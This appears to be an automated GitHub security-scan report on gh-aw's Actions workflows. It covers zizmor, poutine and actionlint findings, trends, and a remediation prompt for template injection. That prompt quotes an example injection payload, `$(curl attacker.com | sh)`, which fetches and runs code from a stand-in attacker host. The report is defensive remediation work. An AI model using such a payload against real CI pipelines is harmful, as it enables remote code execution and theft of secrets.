You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Today's compilation failed with unknown flag: --runner-guard — the same failure seen on 2026-04-08 (3 consecutive failures). This report is based on the last successful scan: 2026-04-04 (§23986109480).
Scan Status: ⚠️ Compile failed today — data from last successful scan (5 days ago)
Note on runner-guard: The --runner-guard flag was introduced in PR #25281 but has not yet been merged into the deployed gh-aw CLI/MCP server version. Compilation has failed on every run since 2026-04-08. Runner-guard findings are unavailable until the flag is deployed.
Findings by Tool (2026-04-04 baseline)
Tool
Total
Critical
High
Medium
Low
zizmor (security)
4,924
0
1,117
3,703
104
poutine (supply chain)
65
34
14
17
0
actionlint (linting)
4,967
—
—
—
—
runner-guard (taint analysis)
N/A
—
—
—
—
Clustered Findings by Tool and Type
Zizmor Security Findings
Issue Type
Severity
Count
Notes
secrets-outside-env
Medium
7,398 occurrences / 4,924 findings
Affects all 181 workflows
unpinned-uses
High
2,182
All 181 workflows via github/gh-aw-actions/setup@v0.65.6
Description: Code injection via GitHub Actions expression template expansion in run: steps — attacker-controlled values from github.event.* or PR/issue data used directly in shell commands
Reference: (docs.zizmor.sh/redacted)
2. Unpinned Action References (High Severity)
Tool: zizmor
Count: 2,182 findings
Severity: High
Affected: All 181 workflows via github/gh-aw-actions/setup@v0.65.6
Description: Actions referenced by tag instead of SHA — supply chain attack surface
Description: Arbitrary code execution risk from untrusted code in PR checkouts
Reference: (docs.poutine.dev/redacted)
Fix Suggestion for Template Injection
Issue: Template injection via $\{\{ github.event.* }} in run: steps Severity: High Affected Workflows: ~47 workflows
Prompt to Copilot Agent:
You are fixing a security vulnerability identified by zizmor: template injection.
**Vulnerability**: template-injection
**Rule**: (docs.zizmor.sh/redacted)
**Current Issue**:
GitHub Actions expressions like `$\{\{ github.event.pull_request.title }}` or
`$\{\{ github.event.issue.body }}` are expanded directly into shell `run:` steps.
An attacker can craft a PR title or issue body containing shell metacharacters
(e.g., `$(curl attacker.com | sh)`) that get executed in the runner.
**Required Fix**:
Move the GitHub expression into an environment variable, then reference that
variable in the shell command. Environment variables are passed safely and are
NOT subject to shell injection.
**Example**:
Before:
```yaml
- name: Process PR title
run: echo "$\{\{ github.event.pull_request.title }}"
```
After:
```yaml
- name: Process PR title
env:
PR_TITLE: $\{\{ github.event.pull_request.title }}
run: echo "$PR_TITLE"
```
Apply this fix to every `run:` step that uses a `$\{\{ github.event.* }}`,
`$\{\{ github.head_ref }}`, `$\{\{ github.actor }}`, or similar untrusted
expression directly in the shell command body.
Affected workflow files (lock.yml):
- audit-workflows.lock.yml
- auto-triage-issues.lock.yml
- contribution-check.lock.yml
- copilot-pr-nlp-analysis.lock.yml
- copilot-session-insights.lock.yml
- copilot-token-audit.lock.yml
- daily-code-metrics.lock.yml
- daily-copilot-token-report.lock.yml
- daily-doc-updater.lock.yml
- daily-firewall-report.lock.yml
- daily-integrity-analysis.lock.yml
- daily-issues-report.lock.yml
- daily-multi-device-docs-tester.lock.yml
- daily-news.lock.yml
- daily-performance-summary.lock.yml
- daily-repo-chronicle.lock.yml
- deep-report.lock.yml
- discussion-task-miner.lock.yml
- docs-noob-tester.lock.yml
- github-mcp-structural-analysis.lock.yml
(and ~27 additional workflows)
View All Findings Details (2026-04-04 baseline)
Zizmor Severity Breakdown
Severity
Count
High
1,117
Medium
3,703
Low
22
Informational
82
Actionlint Shellcheck Details
SC2086 accounts for 94.2% of all actionlint findings (4,680/4,967).
The predominant pattern is unquoted variable expansions in bash:
# Before (flagged)
bash \$\{RUNNER_TEMP}/script.sh
# After (fixed)
bash "\$\{RUNNER_TEMP}/script.sh"
Poutine Growth Analysis
Poutine findings grew from 6 (2026-03-29) → 65 (2026-04-04), a 983% increase in 6 days,
driven by new workflows triggering default_permissions_on_risky_events and github_action_from_unverified_creator_used rules.
Historical Trends
Date
Total
Zizmor
Poutine
Actionlint
Workflows
Status
2026-03-29
7,383
3,455
6
3,928
178
✅
2026-03-30
8,520
3,953
6
4,561
178
✅
2026-03-31
8,562
3,977
19
4,566
178
✅
2026-04-01
8,601
3,992
19
4,590
179
✅
2026-04-02
8,600
3,762
19
4,819
179
✅
2026-04-03
9,757
4,789
39
4,929
183
✅
2026-04-04
9,956
4,924
65
4,967
181
✅ Last good
2026-04-08
—
—
—
—
0
❌ compile_failed
2026-04-09
—
—
—
—
0
❌ compile_failed
Trend (last 12 days): Total findings +35% (7,383 → 9,956), workflows +1.7% (178 → 181). Compile failures: 3 consecutive failures since 2026-04-08 — unblocked by merging PR #25281.
Key Observations
template-injection: Stable at ~214 High findings across ~47 workflows — persistent unresolved
secrets-outside-env: Pervasive, affects all workflows (~7,398 occurrences)
unpinned-uses spike: Grew from 5 to 2,182 between 2026-04-02 and 2026-04-04 via github/gh-aw-actions/setup@v0.65.6
poutine growth: 983% increase in 6 days (6 → 65 findings)
Analysis Summary
Today's compilation failed with
unknown flag: --runner-guard— the same failure seen on 2026-04-08 (3 consecutive failures). This report is based on the last successful scan: 2026-04-04 (§23986109480).Findings by Tool (2026-04-04 baseline)
Clustered Findings by Tool and Type
Zizmor Security Findings
secrets-outside-envunpinned-usesgithub/gh-aw-actions/setup@v0.65.6template-injectionobfuscationartipackedsecrets-inheritgithub-envPoutine Supply Chain Findings
untrusted_checkout_execdefault_permissions_on_risky_eventsgithub_action_from_unverified_creator_usedunverified_script_execunpinnable_actionpr_runs_on_self_hostedActionlint Linting Issues
shellcheck SC2086shellcheck SC2129{ cmd; } >> filepermissionscopilot-requestspermission scoperunner-labelexpressionRunner-Guard Taint Analysis Findings
Issues created: none (runner-guard data unavailable)
Top Priority Issues
1. Template Injection (High Severity)
run:steps — attacker-controlled values fromgithub.event.*or PR/issue data used directly in shell commands2. Unpinned Action References (High Severity)
github/gh-aw-actions/setup@v0.65.63. Untrusted Checkout Execution (Critical — Poutine)
Fix Suggestion for Template Injection
Issue: Template injection via
$\{\{ github.event.* }}inrun:stepsSeverity: High
Affected Workflows: ~47 workflows
Prompt to Copilot Agent:
View All Findings Details (2026-04-04 baseline)
Zizmor Severity Breakdown
Actionlint Shellcheck Details
SC2086 accounts for 94.2% of all actionlint findings (4,680/4,967).
The predominant pattern is unquoted variable expansions in bash:
Poutine Growth Analysis
Poutine findings grew from 6 (2026-03-29) → 65 (2026-04-04), a 983% increase in 6 days,
driven by new workflows triggering
default_permissions_on_risky_eventsandgithub_action_from_unverified_creator_usedrules.Historical Trends
Trend (last 12 days): Total findings +35% (7,383 → 9,956), workflows +1.7% (178 → 181).
Compile failures: 3 consecutive failures since 2026-04-08 — unblocked by merging PR #25281.
Key Observations
github/gh-aw-actions/setup@v0.65.6Recommendations
template-injectionin ~47 affected workflows using the fix prompt abovegithub/gh-aw-actions/setupto a SHA instead of@v0.65.6untrusted_checkout_execin smoke workflow call filesdefault_permissions_on_risky_eventsNext Steps
--runner-guardflag and restore daily scansgithub/gh-aw-actions/setupaction to a specific SHAuntrusted_checkout_execin smoke-workflow-call filesdefault_permissions_on_risky_eventsand add explicitpermissions:blocksReferences: